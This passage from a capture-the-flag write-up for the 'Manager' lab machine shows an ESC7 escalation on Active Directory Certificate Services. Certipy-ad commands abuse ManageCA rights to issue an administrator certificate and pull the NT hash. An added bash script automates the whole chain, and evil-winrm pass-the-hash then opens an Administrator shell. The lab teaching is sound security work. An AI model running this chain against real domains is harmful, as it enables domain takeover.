mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

Two things stand out in this output. First, in the CA permissions, 'MANAGER\Raven' is allowed ManageCA on 'manager-DC01-CA', a right that should be held only by CA administrators. Second, the SubCA template has ENROLLEE_SUPPLIES_SUBJECT set, with no manager approval and no authorized signatures required, so whoever enrolls in it chooses the subject; enrollment is restricted to Domain Admins and Enterprise Admins, but a CA manager can work around that restriction. Together these form the weakness (known as ESC7) that we took advantage of with the tool 'certipy-ad'.

Certipy (packaged as 'certipy-ad') is a tool for enumerating and interacting with Active Directory Certificate Services. It allows you to perform various certificate-related tasks, including requesting, issuing and retrieving certificates, and to change CA settings such as officers and enabled templates. Given the presence of 'certify.exe' and its connection to certificates, I decided to use 'certipy-ad' as the means to escalate my privileges.

You can install certipy-ad with: sudo apt install certipy-ad

Next, I used 'certipy-ad' to interact with Active Directory Certificate Services.
Adding Raven as a certificate officer: I started by adding 'raven' as an officer on the CA with certipy-ad. This was essential because officer rights (ManageCertificates) grant the authority to manage certificate requests on the CA; without them, Raven would not have the permission needed to issue the certificate requested in the following steps.

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password '***************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

Enabling the SubCA template and requesting a certificate: ManageCA also allows enabling templates on the CA, so I enabled SubCA and requested a SubCA certificate with the UPN administrator@manager.htb. The request is expected to fail with CERTSRV_E_TEMPLATE_DENIED, because raven cannot enroll in SubCA; what matters is that the CA still records the request (ID 22 here) and that the private key is saved locally, since the certificate retrieved later has to be paired with it. Answer 'y' when asked to save the key.

certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password '**************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
certipy-ad req -username 'raven@manager.htb' -password '*************' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 22
Would you like to save the private key? (y/N) y
[*] Saved private key to 22.key
[-] Failed to request certificate

Issuing the denied request: as a CA officer, raven can now issue request 22 despite the template denial.

certipy-ad ca -ca 'manager-DC01-CA' -issue-request 22 -username raven@manager.htb -password '**************'
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Retrieving the issued certificate: with the request issued, raven retrieves it. Certipy pairs the certificate with the saved 22.key and writes administrator.pfx, which can be used for PKINIT authentication. Note the 'Certificate has no object SID' line: the certificate carries only the UPN, and the successful TGT later on shows the DC still accepts that UPN-only mapping.

certipy-ad req -username 'raven@manager.htb' -password '***************' -ca 'manager-DC01-CA' -target manager.htb -retrieve 22
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 22
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '22.key'
[*] Saved certificate and private key to 'administrator.pfx'

Authenticating with the obtained certificate:

certipy-ad auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.10.11.236
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)

If you hit this error, what fixed it for me was running certipy from a fresh Python virtual environment. Note that the banner in the later runs reads Certipy v4.8.2 rather than v4.0.0, so the working environment also had a newer certipy (the pip package installs the command as 'certipy', unlike Kali's 'certipy-ad'); if you reproduce this, install it inside the venv with pip install certipy-ad.

python3 -m venv /home/kali/name
source /home/kali/name/bin/activate

The box resets the CA configuration (the added officer and the enabled template) within about a minute, so have every command ready to run back-to-back. A script or a chained one-liner works; keep in mind that the request ID is only known after the req step, so either read it from the output or run the chain once to learn the next ID and re-run quickly with the right number.
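The same chain as a script, added here as an example and not taken from the writeup: it parses the request ID from certipy's own output instead of hard-coding it, checks that the denied request was actually recorded before trying to issue it, and syncs the clock before the PKINIT step. The RAVEN_PASS environment variable and the 'run' argument are assumptions; the CA name, account, host and template are the writeup's. Without arguments it only exercises the ID parsing against a constructed copy of the req output shown above.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): the ESC7 chain against manager.htb as a
# script that reads the request ID from certipy's output, so the issue and
# retrieve steps always use the right ID even though the box resets the CA
# configuration within about a minute. RAVEN_PASS is an assumed environment
# variable; everything else is taken from the writeup. If certipy was installed
# with pip, replace 'certipy-ad' with 'certipy'.
set -eu

CA='manager-DC01-CA'
USER='raven@manager.htb'
PASS="${RAVEN_PASS:-}"
TARGET='manager.htb'
DC_IP='10.10.11.236'

# Pull the number out of a line such as "[*] Request ID is 22".
# Fails (exit 1) when no ID is present so the chain cannot go on with "".
parse_request_id() {
    id=$(printf '%s\n' "$1" | sed -n 's/.*Request ID is \([0-9][0-9]*\).*/\1/p' | head -n 1)
    [ -n "$id" ] || return 1
    printf '%s\n' "$id"
}

# The expected ESC7 outcome: enrollment denied by the template, request still recorded.
request_was_recorded() {
    printf '%s\n' "$1" | grep -q 'CERTSRV_E_TEMPLATE_DENIED' &&
        printf '%s\n' "$1" | grep -q 'Request ID is'
}

esc7_chain() {
    # 1-2: ManageCA lets raven become an officer and turn the SubCA template on.
    certipy-ad ca -ca "$CA" -add-officer raven -username "$USER" -password "$PASS"
    certipy-ad ca -ca "$CA" -enable-template SubCA -username "$USER" -password "$PASS"
    # 3: request as administrator. The template denies enrollment, so capture
    # the output instead of stopping; the piped 'y' answers the "save the
    # private key?" prompt so the key matching the later certificate is kept.
    out=$(printf 'y\n' | certipy-ad req -username "$USER" -password "$PASS" -ca "$CA" \
        -target "$TARGET" -template SubCA -upn 'administrator@manager.htb' 2>&1 || true)
    printf '%s\n' "$out"
    request_was_recorded "$out" || { echo 'request not recorded; CA config probably reset, re-run' >&2; return 1; }
    id=$(parse_request_id "$out")
    # 4-5: as an officer, issue the denied request, then retrieve it into administrator.pfx.
    certipy-ad ca -ca "$CA" -issue-request "$id" -username "$USER" -password "$PASS"
    certipy-ad req -username "$USER" -password "$PASS" -ca "$CA" -target "$TARGET" -retrieve "$id"
    # 6: PKINIT with the certificate. Sync the clock first (the writeup's fix
    # for KRB_AP_ERR_SKEW) or the TGT request fails.
    sudo ntpdate -u "$TARGET"
    certipy-ad auth -pfx administrator.pfx -dc-ip "$DC_IP"
}

# Constructed sample of a certipy v4 'req' run (mirrors the output shown in the
# writeup), used so the parsing can be exercised without a CA.
SAMPLE_REQ_OUTPUT='Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 22
Would you like to save the private key? (y/N) y
[*] Saved private key to 22.key
[-] Failed to request certificate'

if [ "${1:-}" = run ]; then
    [ -n "$PASS" ] || { echo 'set RAVEN_PASS first' >&2; exit 1; }
    esc7_chain
else
    parse_request_id "$SAMPLE_REQ_OUTPUT"   # offline check: prints 22
fi
```

The request-recorded check is the important guard: if the CA has already reset between the enable-template step and the req step, certipy reports a different error without a request ID, and issuing a stale or empty ID would only waste the next reset window.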

certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven@manager.htb' -password '*************' && certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password '*********' && certipy-ad req -username 'raven@manager.htb' -password '**********' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb' && certipy-ad ca -ca 'manager-DC01-CA' -issue-request 23 -username 'raven@manager.htb' -password '***************' && certipy-ad req -username 'raven@manager.htb' -password '**************' -ca 'manager-DC01-CA' -target manager.htb -retrieve 23
certipy auth -pfx administrator.pfx  -dc-ip 10.10.11.236

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[-] Got error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace

However, during this process I encountered a clock skew error. 'KRB_AP_ERR_SKEW' (Clock skew too great) is raised when the time difference between the attacking machine and the DC exceeds what Kerberos tolerates (by default five minutes); the TGT itself was obtained, but the follow-up request for the NT hash failed. If you get this error, you need to sync your clock with the DC.

To synchronize the system time with the 'manager.htb' server, use: sudo ntpdate -u manager.htb. If that does not work, stop systemd from correcting the clock back with sudo timedatectl set-ntp 0, then set it from the DC with sudo rdate -n 10.10.11.236.

Obtaining Administrator Hash

certipy auth -pfx administrator.pfx  -dc-ip 10.10.11.236

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aa****************:ae***************

With the Administrator hash in hand I logged in by passing the hash: evil-winrm's -H option takes the NT half, i.e. the part after the colon in certipy's LM:NT output, so no cleartext password is needed. This gave a shell as Administrator on the domain controller, and the root flag is on the Administrator desktop.

evil-winrm -i 10.10.11.236 -u administrator -H ae*******************

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2023 5:32 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
efa2229********afd60c069a
*Evil-WinRM* PS C:\Users\Administrator\Desktop>